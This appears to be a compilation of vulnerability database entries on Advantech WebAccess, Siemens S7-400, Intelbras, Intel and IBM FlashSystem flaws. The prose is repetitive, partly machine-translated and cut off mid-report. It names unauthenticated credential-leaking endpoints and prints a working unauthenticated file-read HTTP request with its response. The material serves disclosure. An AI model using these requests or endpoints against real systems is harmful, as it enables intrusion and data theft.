VARIoT IoT vulnerabilities database

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several stack-based buffer overflow vulnerabilities have been identified, which may allow an attacker to execute arbitrary code. plural Advantech WebAccess The product contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwsound.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A stack buffer overflow vulnerability exists in several Advantech products

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several SQL injection vulnerabilities have been identified, which may allow an attacker to disclose sensitive information from the host. plural Advantech WebAccess The product includes SQL An injection vulnerability exists.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess Node. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.The specific flaw exists within the handling of the PointList function in BWMobileService.dll. When parsing the ProjectName parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose sensitive information under the context of the database. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several untrusted pointer dereference vulnerabilities have been identified, which may allow an attacker to execute arbitrary code. plural Advantech WebAccess The product includes NULL A vulnerability related to pointer dereference exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x277e IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path transversal vulnerability has been identified, which may allow an attacker to disclose sensitive information on the target. plural Advantech WebAccess The product contains a path traversal vulnerability.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess NMS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the DownloadAction servlet. When parsing the filename and taskname parameters, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose sensitive information under the context of SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a TFTP application has unrestricted file uploads to the web application without authorization, which may allow an attacker to execute arbitrary code. plural Advantech WebAccess The product contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute code on vulnerable installations of Advantech WebAccess NMS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the TFTP service. The issue results from the lack of proper validation of user-supplied data, which can allow for the upload of arbitrary files. An attacker can leverage this vulnerability to execute code under the context of SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A privilege elevation vulnerability exists in several Advantech products that stems from a TFTP application that allows unauthorized uploading of arbitrary files to a web application. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. An escalation of privilege vulnerability exists in several Advantech products. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an improper privilege management vulnerability may allow an authenticated user to modify files when read access should only be given to the user. plural Advantech WebAccess The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows local attackers to escalate privilege on vulnerable installations of Advantech WebAccess Node. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the access control that is set and modified during the installation of the product. The product installation weakens access control restrictions of pre-existing system files and sets weak access control restrictions on new files. An attacker can leverage this vulnerability to execute arbitrary code under the context of Administrator, the IUSR account, or SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A security vulnerability exists in several Advantech products that stems from a program's failure to properly manage permissions. An attacker could use this vulnerability to modify a file. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess etc

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a heap-based buffer overflow vulnerability has been identified, which may allow an attacker to execute arbitrary code. plural Advantech WebAccess The product contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. When parsing the NamedObject structure, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length, heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A heap buffer overflow vulnerability exists in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following products and versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path transversal vulnerability has been identified, which may allow an attacker to execute arbitrary code. Advantech WebAccess Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A path traversal vulnerability exists in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an origin validation error vulnerability has been identified, which may allow an attacker can create a malicious web site, steal session cookies, and access data of authenticated users. Advantech WebAccess Contains a session fixation vulnerability.Information may be obtained. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an information exposure vulnerability through directory listing has been identified, which may allow an attacker to find important files that are not normally visible. Advantech WebAccess Contains a vulnerability in the disclosure of file and directory information.Information may be obtained. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. An attacker could exploit this vulnerability to obtain important files that are not visible. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier

A vulnerability has been identified in SIMATIC S7-400 (incl. F) CPU hardware version 4.0 and below (All versions), SIMATIC S7-400 (incl. F) CPU hardware version 5.0 (All firmware versions < V5.2), SIMATIC S7-400H CPU hardware version 4.5 and below (All versions). The affected CPUs improperly validate S7 communication packets which could cause a Denial-of-Service condition of the CPU. The CPU will remain in DEFECT mode until manual restart. SIEMENS SIMATIC S7-400 CPU and SIMATIC S7-400H CPU Contains a data processing vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The products in the Siemens SIMATIC S7-400 CPU family have been designed for process control in industrial environments. There is a denial of service vulnerability in the Siemens SIMATIC S7-400. Remote attackers may exploit this issue to cause denial-of-service conditions, denying service to legitimate users. F) and SIMATIC S7-400H CPU. The vulnerability is caused by the fact that the program does not correctly verify the S7 communication data package. The following products and versions are affected: Siemens SIMATIC S7-400 4.0 and earlier, SIMATIC S7-400 (incl

Mimo Baby 2 devices do not use authentication or encryption for the Bluetooth Low Energy (BLE) communication from a Turtle to a Lilypad, which allows attackers to inject fake information about the position and temperature of a baby via a replay or spoofing attack. Mimo Baby 2 The device contains an access control vulnerability.Information may be altered. RestDevicesMimoBaby is a baby sleep tracker device from RestDevices, UK. A security vulnerability exists in the RestDevicesMimoBaby2 version that caused the program to fail to properly authenticate or encrypt BluetoothLowEnergy (BLE) traffic between Turtle and Lilypad

MXProgrammer software is a windows desktop software of Weihai Meike Electric Technology Co., Ltd. It is used to communicate with its company's MX series PLC products and complete functions such as program writing and downloading. MXProgrammer software has a denial of service vulnerability. mfc120.dll is a dynamic link library under the MXProgrammer software installation path. When opening a malformed project file, MXProgrammer.exe software crashes due to an illegal access error inside mfc120.dll

An issue was discovered on Intelbras NCLOUD 300 1.0 devices. /cgi-bin/ExportSettings.sh, /goform/updateWPS, /goform/RebootSystem, and /goform/vpnBasicSettings do not require authentication. For example, when an HTTP POST request is made to /cgi-bin/ExportSettings.sh, the username, password, and other details are retrieved. Intelbras NCLOUD 300 Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. IntelbrasNCLOUD300 is a wireless router device from Intelbras, Brazil. A security vulnerability exists in IntelbrasNCLOUD 3001.0, which is caused by a program that fails to require authentication. An attacker can use the vulnerability to obtain sensitive information (such as username, password, and other details) or cause it by sending a request to /cgi-bin/ExportSettings.sh, /goform/updateWPS, /goform/RebootSystem, and /goform/vpnBasicSettings Denial of service (restart), open or close the VPN

In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an external control of file name or path vulnerability has been identified, which may allow an attacker to delete files. plural Advantech WebAccess The product contains a path traversal vulnerability.Information may be tampered with. This vulnerability allows remote attackers to delete arbitrary files on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2715 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to delete files under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier

Bounds check vulnerability in User Mode Driver in Intel Graphics Driver 15.40.x.4 and 21.20.x.x allows unprivileged user to cause a denial of service via local access. Intel Graphics Driver Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Intel Graphics Driver is an integrated graphics driver developed by Intel Corporation. User Mode Driver is one of the user mode drivers

Buffer overflow in Intel system Configuration utilities selview.exe and syscfg.exe before version 14 build 11 allows a local user to crash these services potentially resulting in a denial of service. Intel system Configuration utilities selview.exe and syscfg.exe Contains a buffer error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. An attacker can exploit this issue to obtain sensitive information or cause a denial-of-service condition. Due to the nature of this issue, code execution may be possible but this has not been confirmed. Intel system Configuration utilities selview.exe and syscfg.exe are system configuration utilities of Intel Corporation. Document Title: =============== Intel System CU - Buffer Overflow (Denial of Service) Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2133 Security ID: INTEL-SA-00134 https://nvd.nist.gov/vuln/detail/CVE-2018-3661 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3661 Acknowledgements: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00134.html http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3661 CVE-ID: ======= CVE-2018-3661 Release Date: ============= 2018-07-11 Vulnerability Laboratory ID (VL-ID): ==================================== 2133 Common Vulnerability Scoring System: ==================================== 5.5 Vulnerability Class: ==================== Buffer Overflow Current Estimated Price: ======================== 3.000a! - 4.000a! Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a local buffer overflow vulnerability in the official Intel System CU 14.0 and 14.1. Vulnerability Disclosure Timeline: ================================== 2018-05-15: Release Date (Intel) 2018-07-11: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Intel Systems Product: Intel System - CU (Utilities) 14.0 build & 14.1 build - (IntelA(r) C620 Series Chipsets b19) Exploitation Technique: ======================= Local Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= No User Interaction Disclosure Type: ================ Bug Bounty Program Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in the official Intel System CU 14.0 and 14.1 utilities. The vulnerability can be exploited by local attackers to overwrite active registers to compromise the process or affected computer system. Affected are versions of syscfg.exe before release 14.0 build 16 or for systems based on IntelA(r) C620 Series Chipsets 14.1 build 19. Affected are Versions of selview.exe before release 14.0 build 21 or for systems based on IntelA(r) C620 Series Chipsets before 14.0 build 11. Exploitation of the local buffer overflow vulnerability requires no user interaction and system process privileges. Successful exploitation of the buffer overflow vulnerability results in a compromise of the local system process or affected computer system. Vulnerable File(s): [+] syscfg.exe [+] selview.exe https://www.vulnerability-lab.com/resources/pictures/2133/Intel1.jpg https://www.vulnerability-lab.com/resources/pictures/2133/Intel2.jpg Security Risk: ============== The security risk of the exploitable local buffer overflow vulnerability in the utilities software is estimated as medium. Credits & Authors: ================== S.AbenMassaoud - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution Security GmbH]aC/ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148. IBM FlashSystem V840 and V900 The product contains vulnerabilities related to authorization, permissions, and access control. Vendors have confirmed this vulnerability IBM X-Force ID: 141148 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. Both IBM FlashSystem V840 and V900 are all-flash enterprise-level storage solutions of IBM Corporation in the United States. The solution provides a full set of disaster recovery tools (including snapshot, clone and replication) to protect data security and use IBM Virtual Storage Center to realize virtualization configuration and performance management. Vulnerabilities in IBMs Flashsystems and Storwize Products ------------------------------------------------------------------------- Introduction ============ Vulnerabilities were identified in the IBM Flashsystem 840, IBM Flashsystem 900 and IBM Storwize V7000. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that further vulnerabilities exist. It is strongly recommended that IBM Corporation undertakes a full whitebox security assessment of this application. The version under test was indicated as: 1.6.2.2 build 18 Affected Software And Versions ============================== - IBM Flashsystem 900 - IBM Flashsystem 840 - IBM Storwize V7000 Affected versions are indicated directly within the reported issues. CVE === The following CVEs were assigned to the issues described in this report: CVE-2018-1438 CVE-2018-1433 CVE-2018-1434 CVE-2018-1462 CVE-2018-1463 CVE-2018-1464 CVE-2018-1495 CVE-2018-1467 CVE-2018-1465 CVE-2018-1466 CVE-2018-1461 Vulnerability Overview ====================== 01. CVE-2018-1438: Unauthenticated arbitrary file read on V7000 Unified allowing storage data access 02. CVE-2018-1433: Unauthenticated arbitrary file read via the DownloadFile Handler / Authenticated arbitrary file read via the DownloadFile Handler on v7000 Unified 03. CVE-2018-1434: Web interface vulnerable to CSRF 04. CVE-2018-1462: rBash ineffective as a security measure 05. CVE-2018-1463: World readable credentials and encryption keys 06. CVE-2018-1464: Sensitive file disclosure of files readable by root 07. CVE-2018-1495: Arbitrary file overwrite 08. CVE-2018-1467: Unauthenticated information disclosure 09. CVE-2018-1465: Unprivileged web server process may read SSL private key 10. CVE-2018-1466: Weak password hashing algorithm used 11. CVE-2018-1461: Missing Security Related HTTP Headers Vulnerability Details ===================== --------------------------------------------- CVE-2018-1438. Unauthenticated arbitrary file read on V7000 Unified allowing storage data access --------------------------------------------- On the IBM V7000 Unified System the web handler /DLSnap does not require authentication and allows to read arbitrary files from the system as "root", including the data stored in the storage system from the mounted shares. GET /DLSnap?filename=/ibm/<redacted>/secret-file.txt HTTP/1.1 Host: v7ku01 Connection: close Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: Expires: Wed, 31 Dec 1969 16:00:00 PST X-Frame-Options: SAMEORIGIN Set-Cookie: SonasSessionID=<redacted>; Path=/; Secure; HttpOnly Content-disposition: attachment; filename=secret-file.txt Pragma: Content-Type: application/octet-stream Date: Tue, 16 Jan 2018 11:12:39 GMT Connection: close Content-Length: 4 42 -------------------------------------------------- CVE-2018-1433. Unauthenticated file read via the DownloadFile Handler / Authenticated arbitrary file read via the DownloadFile Handler on v7000 Unified -------------------------------------------------- In case of the following list of products, the DownloadFile handler allows unauthenticated file reading under the "webadmin" user: IBM 